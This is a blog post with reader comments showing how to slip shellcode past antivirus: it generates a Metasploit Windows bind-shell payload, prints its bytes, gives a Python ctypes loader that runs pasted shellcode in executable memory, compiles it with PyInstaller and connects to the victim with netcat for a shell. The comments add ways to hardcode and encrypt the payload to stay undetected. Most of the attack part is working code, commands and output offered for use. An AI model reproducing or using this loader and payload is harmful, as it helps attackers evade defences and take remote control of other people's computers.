Execute Shellcode, Bypassing Anti-Virus…

Hello,

I am going to demonstrate a little trick to allow you to bypass anti-virus and execute shellcode, this is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell, however any shellcode can be used, I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "n" "," | sed s'/,//g' && echo ""
xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5
root@kali:~#

Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:

#!C:Python27python.exe

from ctypes import *

# Grab shellcode from the user so its not hardcoded.
sc = bytearray(input("Paste the shellcode inside single quotes:nn"))
print "nnRunning shellcode in memory...nn"

# Reserves or commits a region of pages in the virtual address space of the calling process.
pointer = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))

buffer = (c_char * len(sc)).from_buffer(sc)

# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(pointer),
                              buffer,
                              c_int(len(sc)))
# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(pointer),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))
# Waits until the specified object is in the signaled state or the time-out interval elapses.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, you're shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to an win32 executable using PyInstaller:

C:Usersmike.evansDesktopAV>c:Python27Scriptspyinstaller.exe -F crypter2.py
82 INFO: wrote C:Usersmike.evansDesktopAVcrypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:Usersmike.evansDesktopAV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:WindowsWinSxSManifestsx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcm90.dll
2058 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloader_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_importers.py
3628 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_archive.py
3693 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_carchive.py
3752 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:Windowssystem32python27.dll
4450 INFO: Warnings written to C:Usersmike.evansDesktopAVbuildcrypter2warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:Usersmike.evansDesktopAVdistcrypter2.exe

Now we have the binary, lets check VirusTotal and see what it scores:

vt

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:Usersmike.evansDesktopAVdist>crypter2.exe
Paste the shellcode inside single quotes:

'xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:Usersmike.evansDesktopAVdist>whoami
whoami
win-2q626uv3ptemike.evans

C:Usersmike.evansDesktopAVdist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.

5 thoughts on “Execute Shellcode, Bypassing Anti-Virus…

  1. … … … UH ?!? The shellcode is just passed as a command-line parameter !!! Should we ask the victim “Hi, can you start the attached .exe file and paste the “0xshellcode” argument into it ? Thanks !” ? How can we use it in a vulnerability exploitation !? Why the fuck do we care about “shellcode detection” by AV (which is non-sense) ? Why using virustotal on a file which does nothing by itself ? In this state, just do “system(argv[1])” executable, it will be the same thing ! Why using win32 API with python and not directly with C/assembly ? THIS IS SO LAME.

    1. Hi,

      Thank you for your comment.

      This was not aimed at social engineering type attacks where you coerce the victim to run the payload. It was more so aimed at when you need to drop a payload on a compromised machine, but the AV is flagging it each time. Situations like these you can run the binary, paste the shellcode of your choice in and have it executed bypassing AV.

      Yes, you can do the same thing in C by casting the buffer to a function pointer, like so: (*(int(*)()) shellcode)();. However I choose to do it in Python as I quite like the language.

      If you wanted to have a complete binary without the need to pass the shellcode in as an argument then you could hardcode it and perform some form of encoding/decoding or runtime decryption on it e.g. with weak AES keys. This way you could compile the script to a binary, not have to paste in the shellcode and still have it bypass AV…

      1. Okay, maybe I’ve been too much agressive… Sorry.

        > If I want to execute something on a compromised machine, it won’t be a shellcode. And if I want to execute a shellcode, I will just transmit it over the network to a dedicated tool (i.e Poison Ivy rat commands which are mostly shellcodes)
        > I was just wondering why not using the kernel32.dll APIs. I believe the shellcode() call won’t work because it’s not stored in a executable memory region. You must perform a VirtualProtect() first.
        > The last remark is just about packing (/encrypt) executable code, and it can be detected by antiviruses like KAV.

        Thanks for your reply, sorry again for the aggressive tone :/

  2. I forgot to mention, initially the shellcode was hardcoded as is. The same technique was followed as in this post, the resulting .exe bypassed all AV’s without need to do anything more. When I came to write the blog post, one AV vendor was flagging it, so I changed it to accept the shellcode as an argument to the binary..

Comments are closed.